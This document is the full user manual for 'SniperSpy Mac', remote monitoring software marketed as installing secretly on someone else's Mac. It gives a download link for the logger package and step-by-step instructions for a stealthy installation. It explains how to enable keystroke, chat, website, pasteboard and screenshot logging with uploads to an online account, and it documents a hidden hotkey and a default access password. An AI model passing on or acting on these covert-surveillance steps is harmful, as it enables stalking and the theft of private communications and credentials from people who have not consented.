Introduction
 SniperSpy remote spy software secretly installs to your remote
Mac. Records chat conversations, web sites, keystrokes and
more.

 The program then uploads user activities and sends the data to
your online account. You login to your account SECURELY to
view logs using your own password-protected login.

View the screen LIVE and see everything they do online in real
time! Browse the file system, view chats, websites, keystrokes
and more, with screenshots. You can also access the LIVE control
panel within your secure online account to perform live
monitoring functions.

Installation Guidelines
Registering Your Account

 After you order, you will instantly receive an email containing


two things: Your registration code and a link to download the
program. You will not be able to properly configure
SniperSpy until you have created your username and
password. For this, you will need to register your account.
Installing
 Once you have registered your account, you will need to
download and install the program.  This needs to be done
on the actual Mac you wish to monitor. While sitting at
the computer you wish to monitor. Go to
http://asd-ms.com/smac/logger.pkg to get the package.
 Once the Logger downloads, double-click the
logger.pkg file to execute the installer..
 Now that the installer package is saved to your
computer, double-click the file to execute the
installer.
 When the installer begins, follow the on-screen
instructions to install the Logger. This process should
take about 1 minute to complete. To ensure the stealth of
SniperSpy Mac, it is recommended to leave all default
installation settings and destinations as they are.
 Once the installation has successfully installed, the
above screen will appear. Click on Close to finish
the installation. As soon as that window closes,
another window will appear. This is the initial
configuration window for SniperSpy Mac.
Contained in this window are all of the logging
settings, which you can customize to fit your
desired needs.
Usage Guidelines
Account Settings
 This menu allows you to choose which online account you want to
have the logs & activity sent to.
 Once you input the user name and password of your registered
account, you MUST click Verify to have SniperSpy verify the
account. Once the account is verified, click Save to save these
settings.
Logging Settings
Logging Settings
 Enable Application Logging: This option will enable / disable
logging of all Applications ran on the monitored computer.

 Enable Keystroke Logging: This option will enable / disable


logging of all keystrokes typed on the monitored computer in any
application.

 Enable Chat Logging: This option will enable / disable logging of


all conversations that take place in an instant messaging session,.

 Enable Website Logging: This option will enable / disable logging


of all websites visited through a web browser, including Safari or
Firefox.
Logging Settings

 Enable Pasteboard Logging: This option will enable / disable logging of all data


copied to the Pasteboard of the monitored computer.

 Enable Screenshot Logging: This option will enable / disable the capturing of


screenshots of the monitored computer.

 Capture Interval: This is the time interval that SniperSpy will capture screenshots


of the monitored computer (if Screenshot Logging is enabled).

 The last option is to tell SniperSpy to stop recording screenshots of the computer if
it has been inactive for the selected amount of time (if Screenshot Logging is
enabled)

 Once these settings have been configured to your needs, click Save.
Splash Screen
 This menu gives the user the option to display a message on the
monitored computer each time it is powered.

To do so, check the Enable Warning Message box and then


type in the box underneath the message to be displayed. Click
Save to save this message.
Activity Report
 This menu contains the setting for how often SniperSpy Mac
uploads recorded logs to the online account.
Here, the user can select the time frame that will suit their
needs best by using the arrows to either increase or decrease
the time interval. Once the desired interval is selected, click
Save to save that interval.
 Once you have configured the program to fit your
needs, click the Red X Button in the top-left
corner to close this window. SniperSpy is now
setup and ready to begin monitoring! You can now
safely delete the logger.pkg file from your desktop.
Bring up the Logger Interface
 f you need to change any settings after you have installed and
configured the program previously, you can bring up the
configuration interface directly on the monitored Mac. To do so,
close all open windows and applications and then press and hold
the CTRL + ALT + SHIFT + S keys. This is the hot key sequence.
Then, the next window that pops up asks for a password. The
default password is: retinax.
 Once you enter the password, the Logger (Configuration) interface
will re-appear.
Change the Hot Key Sequence
and Logger Password

 To change the password for the Logger (the hot key sequence
password), go to the Configure tab on the Apple toolbar in the
top-left corner. Then select Preferences.
Uninstall SniperSpy Mac
 To uninstall SniperSpy Mac from the monitored Macintosh,
you will need to bring up the configuration interface first.
Close all windows and applications and press your hot key
sequence and the password pop-up box will appear. Enter the
password and click OK. Then, once the configuration
interface appears, click Configure in the top-left corner in the
Apple toolbar and then select Preferences.
Once the preference window appears, click on
Uninstall SniperSpy. Then follow any on-screen prompts to
complete the removal of SniperSpy Mac on the monitored
computer.
